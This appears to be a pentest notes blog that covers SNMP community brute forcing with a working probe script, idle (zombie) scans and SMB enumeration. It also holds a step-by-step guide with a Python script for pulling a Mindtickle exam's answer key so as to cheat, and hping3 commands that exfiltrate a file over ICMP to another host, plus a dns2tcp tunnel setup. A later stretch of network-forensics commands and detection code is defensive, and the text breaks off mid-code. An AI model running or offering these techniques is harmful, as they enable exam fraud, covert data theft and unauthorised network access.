Categories
Pentest

SNMP audit walkthrough

Discover hosts running SNMP (UDP/161; -sU is slow, so keep the target range tight)

  • nmap -sU -p 161 target-ip

Brute force the community string (one SNMP GetRequest per candidate word; only a valid community string gets a GetResponse, a wrong one is silently ignored)

  • onesixtyone -c /root/seclist target-ip

Enumerate SNMP information from the host with the community string found

  • snmpenum target-ip public windows.txt
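What onesixtyone does for every word in its list, written out as an added example (this is not code from the original page or from onesixtyone): a hand-built SNMPv1 GetRequest for sysDescr.0 with the candidate community string, and a parser that tells a GetResponse with error-status 0 (valid community) from silence or an error. SAMPLE_RESPONSE is a constructed reply; the only real network I/O is in try_communities(), which is not called on import.

```python
"""SNMPv1 community-string probe built from raw BER, the exchange onesixtyone
repeats for every word in its list: one GetRequest for sysDescr.0 per candidate,
and only a valid community string earns a GetResponse with error-status 0.
Added example, not code from the original page; SAMPLE_RESPONSE below is a
constructed reply, and the only real network I/O is in try_communities()."""
import socket
import sys

SYS_DESCR = "1.3.6.1.2.1.1.1.0"          # sysDescr.0, the OID onesixtyone asks for

# ASN.1 BER tags used by SNMPv1 (RFC 1157)
TAG_INT, TAG_OCTETS, TAG_NULL, TAG_OID, TAG_SEQ = 0x02, 0x04, 0x05, 0x06, 0x30
TAG_GET_REQUEST, TAG_GET_RESPONSE = 0xA0, 0xA2


def _len(n):
    """BER length octets: short form below 128, long form (0x80|k, then k bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, value):
    return bytes([tag]) + _len(len(value)) + value


def _int(n):
    """Non-negative INTEGER; a leading 0x00 is added when the top bit would be set."""
    return _tlv(TAG_INT, n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big"))


def _oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 big-endian."""
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(TAG_OID, bytes(out))


def build_get_request(community, oid=SYS_DESCR, request_id=1):
    """SNMPv1 GetRequest for one OID, authenticated by nothing but the community string."""
    varbind = _tlv(TAG_SEQ, _oid(oid) + _tlv(TAG_NULL, b""))
    pdu = _int(request_id) + _int(0) + _int(0) + _tlv(TAG_SEQ, varbind)
    return _tlv(TAG_SEQ, _int(0) + _tlv(TAG_OCTETS, community.encode()) + _tlv(TAG_GET_REQUEST, pdu))


def _read_tlv(buf, pos):
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:                               # long-form length
        k = n & 0x7F
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + n], pos + n


def _children(buf):
    pos, out = 0, []
    while pos < len(buf):
        tag, val, pos = _read_tlv(buf, pos)
        out.append((tag, val))
    return out


def _decode_oid(body):
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def parse_response(packet):
    """Return (community, error_status, {oid: value}) for a GetResponse, else None."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != TAG_SEQ:
        return None
    (_, _version), (_, community), (pdu_tag, pdu) = _children(msg)
    if pdu_tag != TAG_GET_RESPONSE:
        return None
    fields = _children(pdu)                   # request-id, error-status, error-index, varbinds
    error_status = int.from_bytes(fields[1][1], "big")
    varbinds = {}
    for _, vb in _children(fields[3][1]):
        (_, oid), (vtag, val) = _children(vb)
        varbinds[_decode_oid(oid)] = val.decode("latin-1") if vtag == TAG_OCTETS else val
    return community.decode("latin-1"), error_status, varbinds


# Constructed sample: what an agent answers to build_get_request("public") when
# sysDescr.0 is the string "Linux".
SAMPLE_RESPONSE = bytes.fromhex(
    "302b" "020100" "04067075626c6963" "a21e" "020101" "020100" "020100"
    "3013" "3011" "06082b06010201010100" "04054c696e7578"
)


def try_communities(target, wordlist, timeout=1.0):
    """One GetRequest per candidate; silence means the community was wrong
    (SNMPv1 agents do not answer a bad community), error-status 0 means it works."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    hits = []
    for req_id, word in enumerate(wordlist, start=1):
        sock.sendto(build_get_request(word, request_id=req_id), (target, 161))
        try:
            data, _ = sock.recvfrom(4096)
        except socket.timeout:
            continue
        parsed = parse_response(data)
        if parsed and parsed[1] == 0:
            hits.append((word, parsed[2].get(SYS_DESCR)))
    sock.close()
    return hits


if __name__ == "__main__":                    # usage: snmp_probe.py target-ip wordlist
    words = [w.strip() for w in open(sys.argv[2]) if w.strip()]
    for community, descr in try_communities(sys.argv[1], words):
        print("%s [%s] %s" % (sys.argv[1], community, descr))
```

The point worth remembering from the packet layout: the community string is an OCTET STRING sent in clear, so anyone on the path who sees a single GetRequest has it, and there is no lockout, which is why a wordlist against UDP/161 is cheap and quiet.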

 

Categories
Pentest

hping3

hping3 -S -r -p 135 x.x.x.x

  • -S send a TCP SYN
  • -r show the IP ID as a relative increment (id=+1 on every reply means the host uses an incremental IP ID, i.e. it can serve as an idle-scan zombie)
  • -p target port (an open port, so the host answers and consumes an IP ID)

hping3 -a zombie-ip -S -p 23 target-ip

  • -a spoof the source address (the SYN appears to come from the zombie, so the target's SYN/ACK or RST is sent to the zombie, not to you)
  • -p target service port

Probe the zombie's IP ID with -r before and after the spoofed SYN: an increase of 2 means the port is open (the zombie answered the target's SYN/ACK with a RST), an increase of 1 means closed or filtered (the zombie received nothing, or a RST it silently dropped).

 

Categories
Pentest

How to cheat / pass Mindtickle exams with a 100% score

The whole answer key is shipped to the browser inside the SCORM package, only Base64 encoded. Base64 is an encoding, not encryption: anything that reaches the client can be read by the client.

1. Install Firefox

2. Start your Mindtickle course in the Firefox browser

3. Open Web Developer -> Web Console

4. This should open something like this:

Picture1

5. Now select the Debugger tab and browse to the cf-**.mindtickle.com site icon and the underlying folder structure 920xxx -> scormcontent -> lib -> index.html

Picture2

6. Press Ctrl+F (Cmd+F on macOS) and search index.html for window.courseData

Picture3

7. Make sure to select and copy the complete Base64 encoded text

8. Paste the Base64 encoded text into an online decoder such as https://www.base64decode.org/ and click Decode to get the clear-text result (or run base64 -d locally; the data does not have to leave your machine)

Picture4

9. Save the decoded text in a file and open it in your preferred editor

10. Now search for a question from your exam and look up the correct answer:

Picture5

11. Finish your exam and end up with a 100% score 😉

Now let's automate this further with a Python script.

1. Follow the first five steps above, but this time download the index.html file:

pic-1

2. Paste the following Python code into a file and save it with the .py extension:

import base64
import json

print('')
print('##########-----HELLO-CHEATER-----##########')
print('')
print('Please provide the full path of the downloaded MindTickle index.html')
print('Example = /Users/YOURUSERNAME/Desktop/index.html')
print('')
path = input('Path = : ').strip().strip('\'"')   # quotes around the path are tolerated
print('')

course = None
with open(path, encoding='utf-8') as search:
    for line in search:
        line = line.rstrip()  # remove '\n' at end of line
        if 'window.courseData' in line:
            # the line looks like:  window.courseData = "<base64>";
            encoded = line.split('=', 1)[1].strip().rstrip(';').strip('"')
            course = json.loads(base64.b64decode(encoded))
            break

if course is None:
    raise SystemExit('window.courseData not found in ' + path)

# the exam is the first lesson of type "quiz"
quiz = next((lesson for lesson in course['course']['lessons'] if lesson['type'] == 'quiz'), None)
if quiz is None:
    raise SystemExit('no quiz lesson found in courseData')

# every quiz item carries the question title, the id of the correct answer and all answers
correct_ids = [{'id': item['correct'], 'title': item['title']} for item in quiz['items']]
answer_list = [{'id': answer['id'], 'title': answer['title']}
               for item in quiz['items'] for answer in item['answers']]

print('###########################################')
print('###-The-Correct-MindTickle-Answers-Are:-###')
print('###########################################')
print('')
for question in correct_ids:
    for answer in answer_list:
        if answer['id'] == question['id']:
            print('Question: ' + question['title'])
            print('Answer  : ' + answer['title'])
            print('-------------------------------------------')
print('')
print('#############------ENJOY-----##############')
print('####-Created-By-MSX-@-Rootsecurity.nl-#####')
print('#############--23/03/2020--################')
print('###########################################')
3. Execute the file with Python as shown below
pic-2
4. Enter the file location of the stored index.html file as shown below and press Enter
pic-3
5. Enjoy the output of questions and answers together
pic-5
Categories
Pentest

SMB

Scan for SMB hosts

  • nmap -sS -p 139,445 target-ip/range

Run nbtscan to obtain NetBIOS info

  • nbtscan -v target-ip

Enumerate shares, first anonymously and then with credentials

* smbmap -H ip -u anonymous
* smbmap -H ip -u anonymous -r --depth 5
* smbmap -d domain -u user -p password -H x.x.x.x
* smbmap -d domain -u user -p password -H x.x.x.x -R sharename (list the files in a share recursively)

* smbclient -c "recurse;ls" //x.x.x.x/SYSVOL -U domain\\user%password
* smbclient -L //ip
* smbclient \\\\IP\\ADMIN$ -U user
* get filename

* Copy folders (recursive, non-interactive download of a whole directory)
smbclient '\\server\share'
mask ""
recurse ON
prompt OFF
cd 'path\to\remote\dir'
lcd '~/path/to/download/to/'
mget *
Categories
Pentest

NIKTO (web)

nikto -h ip -p 80
owasp-zap

Categories
nmap Pentest Uncategorized

nmap

* nmap --script-updatedb
* nmap -p 1-65535 -T4 -A -v
* nmap -p 1-65535 -sV -sS -T4 IP
* nmap -sC -sV -oA name ip
* nmap -T4 -A -sV -v3 -d -oA output --script all target

Note that --script all also runs the intrusive, dos and brute categories; against anything you care about, prefer --script "default or safe".

/usr/share/nmap/scripts/

less name.nmap

  • nmap -sS TCP SYN (half-open) scan
  • nmap -sT full TCP connect scan
  • nmap -sU UDP scan
  • nmap -oX output in XML format
  • xsltproc portscan.xml -o portscan.html (render the XML report as HTML)

Zombie Scan

  1. find a host whose IP ID increments by 1 for every packet it sends, and that is otherwise idle
  2. nmap -O -v -n ip
  3. if the output shows "IP ID Sequence Generation: Incremental" the host is a good zombie

Use the zombie to scan another host

1. nmap -Pn -sI zombieip:openport targetip -p23 -v
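The mechanics behind the hping3 -r / -a commands above and behind nmap -O / -sI, as an added example that is not code from the original page, nmap or hping3: a classifier for a host's IP ID sequence (the zombie-suitability check) and a simulated idle scan in which both hosts are modelled in-process, so no packet is sent. The classification thresholds are an approximation of nmap's verdicts, not its source, and the Zombie/Target classes are assumptions made for the simulation.

```python
"""Idle (zombie) scan mechanics: the IP ID classification nmap -O performs when
you look for a zombie, and the open/closed inference from the zombie's IP ID
before and after the spoofed SYN. Added example, not code from the original
page; both hosts are simulated in-process, nothing is sent on the wire, and the
classification thresholds are an approximation of nmap's, not its source."""

IPID_MOD = 1 << 16     # IP ID is a 16-bit field, so deltas must be taken modulo 65536


def classify_ipid(ids):
    """Verdict on a list of IP IDs seen in consecutive replies from one host.
    Only 'Incremental' hosts are usable as idle-scan zombies."""
    deltas = [(b - a) % IPID_MOD for a, b in zip(ids, ids[1:])]
    if not deltas:
        return "Insufficient data"
    if all(d == 0 for d in deltas):
        return "All zeros" if ids[0] == 0 else "Constant"
    if all(1 <= d < 10 for d in deltas):
        return "Incremental"
    swapped = [((d & 0xFF) << 8) | (d >> 8) for d in deltas]   # host sends the counter byte-swapped
    if all(1 <= d < 10 for d in swapped):
        return "Broken little-endian incremental"
    if all(d < 20000 for d in deltas):
        return "Random positive increments"
    return "Randomized"


class Zombie:
    """Host with one global, incrementing IP ID counter (what hping3 -r exposes as id=+N)."""

    def __init__(self, start=1000, background_packets=0):
        self.ipid = start
        self.background_packets = background_packets   # traffic the host sends on its own

    def _send(self):
        self.ipid = (self.ipid + 1) % IPID_MOD
        return self.ipid

    def receive(self, pkt):
        """Unsolicited SYN/ACK -> RST, which consumes one IP ID (RFC 793);
        an unsolicited RST is dropped silently and consumes nothing."""
        if pkt["flags"] == "SA":
            return self._send()
        return None

    def idle_period(self):
        for _ in range(self.background_packets):
            self._send()


class Target:
    """Scanned host: SYN to an open port -> SYN/ACK, closed -> RST, filtered -> nothing."""

    def __init__(self, open_ports=(), filtered_ports=()):
        self.open_ports, self.filtered_ports = set(open_ports), set(filtered_ports)

    def receive(self, pkt, hosts):
        if pkt["dport"] in self.filtered_ports:
            return                                   # firewall drops it; the zombie sees nothing
        flags = "SA" if pkt["dport"] in self.open_ports else "R"
        hosts[pkt["src"]].receive({"flags": flags, "src": "target"})   # reply goes to the spoofed source


def probe_ipid(zombie):
    """Attacker sends a SYN/ACK to the zombie (e.g. hping3 -S -A -r zombie-ip)
    and reads the IP ID of the RST it answers with."""
    return zombie.receive({"flags": "SA", "src": "attacker"})


def idle_scan(zombie, target, port):
    """One port, the way nmap -sI / hping3 -a zombie-ip -S -p port target does it."""
    hosts = {"zombie": zombie, "target": target}
    before = probe_ipid(zombie)
    zombie.idle_period()
    target.receive({"flags": "S", "src": "zombie", "dport": port}, hosts)   # SYN with spoofed source
    zombie.idle_period()
    after = probe_ipid(zombie)
    delta = (after - before) % IPID_MOD
    if delta == 2:
        return "open"                  # zombie RSTed the target's SYN/ACK: one extra IP ID
    if delta == 1:
        return "closed|filtered"       # only our own probe consumed an IP ID
    return "unknown (zombie not idle, delta=%d)" % delta
```

The modulo arithmetic matters in practice: a zombie whose counter wraps from 65535 to 0 between the two probes still gives the right verdict, and a zombie with any background traffic of its own gives deltas above 2, which is why nmap sends several probes per port and why the idle in "idle scan" is a hard requirement.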

 

 

Categories
Hacking Network Forensics Wireshark

Data exfiltration over ICMP

hping3 on Kali Linux

-E filename   file whose contents fill the ICMP payload
-1            use ICMP (echo request) mode
-u            tell you when --file reached EOF and prevent rewinding (otherwise the file is sent again from the start)
-i 10         send one packet every 10 seconds (slow and quiet; -i u<microseconds> for faster)
-d 95         payload size in bytes per packet, so the file goes out in 95-byte chunks

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95 192.168.20.106
HPING 192.168.20.106 (eth0 192.168.20.106): icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=123 ip=192.168.20.106 ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip=192.168.20.106 ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip=192.168.20.106 ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip=192.168.20.106 ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

The 28 header bytes are the 20-byte IP header plus the 8-byte ICMP header; len=123 is 28 + 95.

Contents of the file sent, "dns2tcp.txt":

root@kali:~# cat dns2tcp.txt
Kali

dns2tcpd configuration (dns2tcpdrc) and the command that starts the server with it:

cat dns2tcpdrc

listen = 192.168.20.243
port = 53
user = nobody
chroot = /tmp/
domain = ns01.rootsecurity.info
resources = ssh:127.0.0.1:22
dns2tcpd -F -d 3 -f /dns2tcpdrc

Monitor on the receiving end using Wireshark

icmp-1

icmp display filter

icmp-2
The first session contains the first part of the original file
icmp-3
The second session contains the rest of the file, and so on
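The receiving side of the exchange above, as an added example that is not code from the original page or from hping3: the file is cut into 95-byte echo-request payloads the way -d 95 does, the packets are reassembled by icmp.seq (they can be captured out of order) and a small heuristic flags payloads that are not the stock ping pattern, which is what you would run over the icmp-filtered frames in Wireshark. The packets are constructed in-process; NUL padding of the last chunk is an assumption, as the page does not show hping3's padding byte.

```python
"""The receiving side of 'hping3 -1 -E file -d 95': reassembling a file from
ICMP echo-request payloads and a first-pass heuristic for spotting such
payloads in a capture. Added example, not code from the original page; the
packets are constructed here, and NUL padding of the last chunk is assumed
(hping3's own padding byte is not documented on this page)."""
import struct

ICMP_ECHO_REQUEST = 8
ICMP_HDR = struct.Struct("!BBHHH")           # type, code, checksum, identifier, sequence


def checksum(data):
    """RFC 1071 ones'-complement checksum; verifying a packet that includes its
    own checksum field must yield 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def chunk_file(data, size=95):
    """Split the file into fixed-size payloads the way -d 95 does; last chunk padded."""
    chunks = [data[i:i + size] for i in range(0, len(data), size)]
    if chunks:
        chunks[-1] = chunks[-1].ljust(size, b"\x00")
    return chunks


def build_echo(seq, payload, ident=0x1234):
    """ICMP echo request as it sits behind the IP header: 8 header bytes + payload."""
    hdr = ICMP_HDR.pack(ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    return ICMP_HDR.pack(ICMP_ECHO_REQUEST, 0, checksum(hdr + payload), ident, seq) + payload


def parse_echo(pkt):
    typ, code, _csum, ident, seq = ICMP_HDR.unpack(pkt[:ICMP_HDR.size])
    return {"type": typ, "code": code, "id": ident, "seq": seq,
            "payload": pkt[ICMP_HDR.size:], "checksum_ok": checksum(pkt) == 0}


def reassemble(packets, ident=None):
    """Echo requests of one stream (same icmp.ident), ordered by icmp.seq because
    they can be captured out of order; payloads concatenated, padding stripped.
    Caveat: a file that legitimately ends in NUL bytes loses them here."""
    parsed = [parse_echo(p) for p in packets]
    parsed = [p for p in parsed
              if p["type"] == ICMP_ECHO_REQUEST and p["checksum_ok"]
              and (ident is None or p["id"] == ident)]
    parsed.sort(key=lambda p: p["seq"])
    return b"".join(p["payload"] for p in parsed).rstrip(b"\x00")


# Default echo payloads as sent by iputils ping (56 bytes: 16 bytes of timestamp
# and zeros, then 0x10..0x37) and Windows ping (32 bytes 'abcdefghijklmnopqrstuvwabcdefghi').
LINUX_PATTERN = bytes(range(0x10, 0x38))
WINDOWS_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def is_default_payload(payload):
    return payload == WINDOWS_PAYLOAD or (len(payload) == 56 and payload[16:] == LINUX_PATTERN)


def exfil_indicators(payload):
    """Reasons to look closer at an echo payload; empty list for a stock ping.
    A tunnel that mimics the default pattern will not trip this, which is the caveat."""
    if is_default_payload(payload):
        return []
    reasons = []
    if len(payload) not in (32, 56):
        reasons.append("non-default payload length %d" % len(payload))
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
    if payload and printable / len(payload) > 0.9:
        reasons.append("payload is mostly printable text")
    if payload and not reasons:
        reasons.append("payload differs from the stock ping pattern")
    return reasons
```

In Wireshark the same grouping is icmp.type == 8 && icmp.ident == N, sorted by icmp.seq; the data bytes are the icmp.data field, which is what the screenshots above show in the packet bytes pane.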
Categories
Network Forensics

Network Forensics Tools & Commands

Sort & Uniq

| sort | uniq -c | sort -nr

tshark

tshark -r file -Y <display filter> -T fields -e <fieldname>

tshark -r /cases/*.pcap -Y ftp -T fields -e ip.src -e ip.dst | sort | uniq -c | sort -nr

  • Identify search strings

tshark -n -r /cases/*.pcap -Y 'http.host contains "google" and http.request'

  • Determine POSTs to a domain

tshark -n -r /cases/*.pcap -Y 'http.host contains "dropbox.com" and http.request.method == "POST"'

  • Observe the content of a frame by number

tshark -n -x -r /cases/*.pcap -Y 'frame.number==27757'

  • Identify the TCP stream number a frame belongs to

tshark -n -r /cases/*.pcap -Y 'frame.number==27757' -T fields -e tcp.stream

  • Extract the (base64) payload of that stream; substitute the tcp.stream value found above, it is a separate counter and not the frame number

tshark -n -r /cases/*.pcap -Y 'tcp.stream==27757' -T fields -e tcp.segment_data > /cases/extract.txt

  • Analyse web URL requests

tshark -n -r /cases/*.pcap -T fields -E separator=/t -e frame.number -e frame.time -e http.referer -e http.cookie -Y 'http.request.uri contains "dropbox"'

MD5SUM

md5sum cases.pcap

TCPdump

sudo tcpdump -n -i eth0 -s 0 “arp”

sudo tcpdump -n -i eth0 -s 0 “arp and not ether dst ff:ff:ff:ff:ff:ff”

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap “net 192.168.20.0/27”

Capinfos

  • List pcap filename, hashes and first/last packet (capture) times in table form

capinfos -T -H -a -e *.pcap /cases/*

Editcap

  • Cut a capture down to a time window

editcap -A '2015-11-15 00:00:00' -B '2015-11-16 00:00:00' /cases/*.pcap ~/smaller.pcap

Base64

  • Encode to Base64

cat file | base64 > file.txt

  • URL-encoded Base64 decode

Obtain the base64 text from Follow TCP Stream in Wireshark and save it to a file. When it was sent in a form POST it is also percent-encoded (+ becomes %2B, / becomes %2F, = becomes %3D), so undo that first:

cat base64-from-url.txt | uridecode.py > native-base64.txt

Decode the base64 data into a new file (-i ignores non-alphabet garbage such as stray line breaks)

base64 -di native-base64.txt > decode-base64.bin

  • Check the intended file type

file decode-base64.bin

unzip -t decode-base64.bin

  • On Windows, certutil does the same decode

certutil -decode file.txt test.exe
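The tshark-to-carved-file pipeline from the two sections above (tcp.segment_data extraction, percent-decode, tolerant base64 decode, file type check, unzip -t), in one script as an added example that is not code from the original page. constructed_capture() fabricates what tshark -T fields -e tcp.segment_data prints for a two-segment HTTP POST carrying a zip archive; the colon-separated hex format and the form field name "file" are assumptions of this example.

```python
"""From tshark field output to a carved file: colon-separated hex -> bytes ->
one form field -> percent-decode -> tolerant base64 decode (the `base64 -di`
behaviour) -> file type by magic bytes -> `unzip -t` equivalent.
Added example, not code from the original page; constructed_capture() fabricates
what `tshark -T fields -e tcp.segment_data` prints for a two-segment HTTP POST."""
import base64
import io
import urllib.parse
import zipfile

B64_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")
MAGIC = [(b"PK\x03\x04", "zip"), (b"MZ", "pe/exe"), (b"\x7fELF", "elf"),
         (b"%PDF", "pdf"), (b"\x1f\x8b", "gzip"), (b"\x89PNG", "png")]


def tshark_hex_to_bytes(lines):
    """tshark prints byte fields as 'de:ad:be:ef', one line per frame; frames
    without segment data give empty lines, which are skipped."""
    out = bytearray()
    for line in lines:
        line = line.strip()
        if line:
            out += bytes.fromhex(line.replace(":", ""))
    return bytes(out)


def form_field(blob, name):
    """Value of one application/x-www-form-urlencoded field in a captured POST;
    HTTP headers (if the stream starts with them) are dropped first."""
    body = blob.split(b"\r\n\r\n", 1)[-1]
    for pair in body.split(b"&"):
        key, _, value = pair.partition(b"=")
        if key == name.encode():
            return value
    return None


def decode_base64_tolerant(raw, url_encoded=True):
    """unquote (not unquote_plus: '+' is base64 alphabet here, not a space),
    keep alphabet characters only, recompute padding, decode."""
    text = raw.decode("latin-1")
    if url_encoded:
        text = urllib.parse.unquote(text)
    clean = "".join(c for c in text if c in B64_ALPHABET)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean)


def sniff_type(data):
    """Poor man's `file`: match the leading magic bytes."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    return "unknown"


def zip_check(data):
    """`unzip -t` equivalent: member names and the first corrupt member (None if all CRCs pass)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist(), zf.testzip()


def carve(lines, field=None):
    """Full pipeline over tshark output; returns (type, bytes)."""
    blob = tshark_hex_to_bytes(lines)
    raw = form_field(blob, field) if field else blob
    if raw is None:
        raise ValueError("field %r not found in the stream" % field)
    data = decode_base64_tolerant(raw)
    return sniff_type(data), data


def constructed_capture():
    """Fabricated input: a zip archive, base64 + percent-encoded, POSTed as the
    'file' field, split over two TCP segments and printed the way tshark would."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("secret.txt", "exfiltrated data\n")
    b64 = base64.b64encode(buf.getvalue()).decode()
    body = "file=" + urllib.parse.quote(b64, safe="") + "&note=x"
    http = ("POST /upload HTTP/1.1\r\nHost: dropbox.com\r\n"
            "Content-Length: %d\r\n\r\n%s" % (len(body), body)).encode()
    half = len(http) // 2
    as_tshark = lambda seg: ":".join("%02x" % b for b in seg)
    return [as_tshark(http[:half]), "", as_tshark(http[half:])]
```

Two details that bite in real captures: unquote_plus would turn every + of the base64 alphabet into a space and corrupt the decode, and running the decode over the whole stream instead of one field pulls HTTP header letters into the base64 input, so select the field (or the exact stream bytes) before decoding.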

ARPScan

sudo arp-scan -l

Wireshark filters

arp and not eth.dst == ff:ff:ff:ff:ff:ff

http.request and http.host contains "google"

http.request.method == "POST" and http.host contains "dropbox.com"

String comparisons in display filters are case-sensitive, so "post" matches nothing; the method is always upper case on the wire.

nfdump

  • Order by number of bytes, aggregate on protocol

nfdump -O bytes -o extended -R cases/ 'ip 8.8.8.8' -A proto

  • Show only flows with just the SYN flag set (connection attempts), order by packets, aggregate on src & dst IP

nfdump -O packets -R cases/ -A srcip,dstip 'proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU'

  • Example with custom output format and filter

nfdump -O packets -A dstip -t '2015/07/15-2015/08/15' -R cases/ -o 'fmt:%da %pkt %fl %bpp' 'proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU and (dst ip 4.4.4.4 or dst ip 3.3.3.3 or dst ip 2.2.2.2)'

  • Output formats

-o long, extended

-o "fmt:%sa %da"

Tag   Description                 Tag   Description
%ts   Start Time - first seen     %in   Input Interface num
%te   End Time - last seen        %out  Output Interface num
%td   Duration                    %pkt  Packets
%pr   Protocol                    %byt  Bytes
%sa   Source Address              %fl   Flows
%da   Destination Address         %flg  TCP Flags
%sap  Source Address:Port         %tos  Type of Service
%dap  Destination Address:Port    %bps  bps - bits per second
%sp   Source Port                 %pps  pps - packets per second
%dp   Destination Port            %bpp  bpp - bytes per packet
%sas  Source AS
%das  Destination AS

-B  bidirectional aggregation; flow direction is guessed from the port numbers (>1024 client, <1024 server)

nfdump -B -O tstart -o extended -R 2013/ -o 'fmt:%ts %te %sa %da %d' 'proto tcp and src ip 8.8.8.8 and flags S and not flags AFRPU'

Squid

/etc/squid/squid.conf

/var/log/squid/*

/var/spool/squid/*

Enable referer logging: add %{Referer}>h to the logformat in squid.conf (older Squid 2.x builds needed the --enable-referer-log compile option and a referer_log directive instead)

SMB protocol Wireshark filters

An SMB session stays active until:

- the network connection times out
- the user closes the session
- the user de-authenticates (logoff)
- the connection fails a server-side security check

Protocol Negotiation        "smb.cmd == 0x72"

LANMAN / NTLM negotiation

Session Establishment       "smb.cmd == 0x73"

The spnego.negResult field indicates whether authentication was successful: result = 0x00 (accept-completed)

The Process ID gives an indication of whether authentication was initiated by a core system process (<1000) or a user-level process (>1000); treat this as a heuristic, not a rule

Every request/response pair is identified by the Multiplex ID (smb.mid), which is how client and server (and you, in a capture) pair a response with its request

When authentication succeeds a User ID (smb.uid) is assigned, valid only for the duration of that SMB session

Accessing a Service         "smb.cmd == 0x75"

Request access to a resource (share)

The server checks; if successful a Tree ID (smb.tid) is added

Network Directory           "smb.cmd == 0x32 && smb.trans2.cmd == 0x0005 && smb.qpi_loi == 1004"

Opening a file              "smb.cmd == 0xa2"

If a client is permitted access to a file, the server returns a File ID (FID). FIDs are small numbers that the server hands out again once a file is closed, so do not use the FID alone to track file access; use the file name from the create request instead:

smb.cmd == 0xa2 and !smb.fid and smb.file

Create and Request          "smb.cmd == 0xa2 and !smb.fid and smb.file"

Locking a file for access   "smb.cmd == 0x24"

Reading from a file         "smb.cmd == 0x2e"

Closing a file              "smb.cmd == 0x04"

Tree Disconnect             "smb.cmd == 0x71"

Uses the corresponding Tree ID

Logoff                      "smb.cmd == 0x74"

Uses the corresponding UID & PID

Process ID   smb.pid   (smb.pid == 996 or, in hex, smb.pid == 0x03e4)
User ID      smb.uid
Tree ID      smb.tid
File ID      smb.fid

  • Export objects from SMB in Wireshark

Wireshark -> File -> Export Objects -> SMB/SMB2
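The session lifecycle above turned into a tracker, as an added example that is not code from the original page: NT Create requests are paired with their responses via smb.mid, the returned FID is keyed under (uid, tid) only while the handle is open, reads, writes and closes are attributed to the file name, and a logoff drops every handle of that UID. ROWS is constructed to resemble tshark -T fields -E separator='|' output for the listed smb.* fields; that tshark prints these numbers as hex or decimal (both are parsed) and the sample's PIDs, MIDs and FIDs are assumptions of this example.

```python
"""Tracking SMB1 file activity by UID/TID/FID, with the FID mapped back to the
file name from the NT Create request (paired with its response via smb.mid).
Added example, not code from the original page; ROWS is constructed to look like
  tshark -r cap.pcap -Y smb -T fields -E separator='|' -e frame.number -e smb.cmd
    -e smb.flags.response -e smb.pid -e smb.mid -e smb.uid -e smb.tid -e smb.fid -e smb.file
on the assumption that tshark prints these numeric fields as hex or decimal (both parse)."""

NT_CREATE, READ, WRITE, CLOSE, LOGOFF = 0xA2, 0x2E, 0x2F, 0x04, 0x74
ACTION = {READ: "read", WRITE: "write"}


def parse_rows(text):
    """One tshark record per line, '|'-separated, empty strings for absent fields."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split("|")
        rows.append({"frame": int(f[0]), "cmd": int(f[1], 0), "response": f[2] == "1",
                     "pid": int(f[3], 0), "mid": int(f[4], 0), "uid": int(f[5], 0),
                     "tid": int(f[6], 0), "fid": int(f[7], 0) if f[7] else None,
                     "file": f[8]})
    return rows


class SmbFileTracker:
    """Keeps (uid, tid, fid) -> filename while a handle is open and emits a timeline of
    (frame, uid, tid, action, filename). A FID alone is not a stable key: the server
    hands the same small number out again once the file is closed."""

    def __init__(self):
        self.pending_create = {}   # (pid, mid) of an outstanding NT Create -> requested name
        self.open_handles = {}     # (uid, tid, fid) -> filename
        self.timeline = []

    def _emit(self, row, action, name):
        self.timeline.append((row["frame"], row["uid"], row["tid"], action, name))

    def feed(self, row):
        cmd, handle = row["cmd"], (row["uid"], row["tid"], row["fid"])
        if cmd == NT_CREATE and not row["response"]:
            self.pending_create[(row["pid"], row["mid"])] = row["file"]
        elif cmd == NT_CREATE:
            name = self.pending_create.pop((row["pid"], row["mid"]), "<unmatched create>")
            self.open_handles[handle] = name
            self._emit(row, "open", name)
        elif cmd in ACTION and not row["response"]:
            self._emit(row, ACTION[cmd], self.open_handles.get(handle, "<unknown fid>"))
        elif cmd == CLOSE and not row["response"]:
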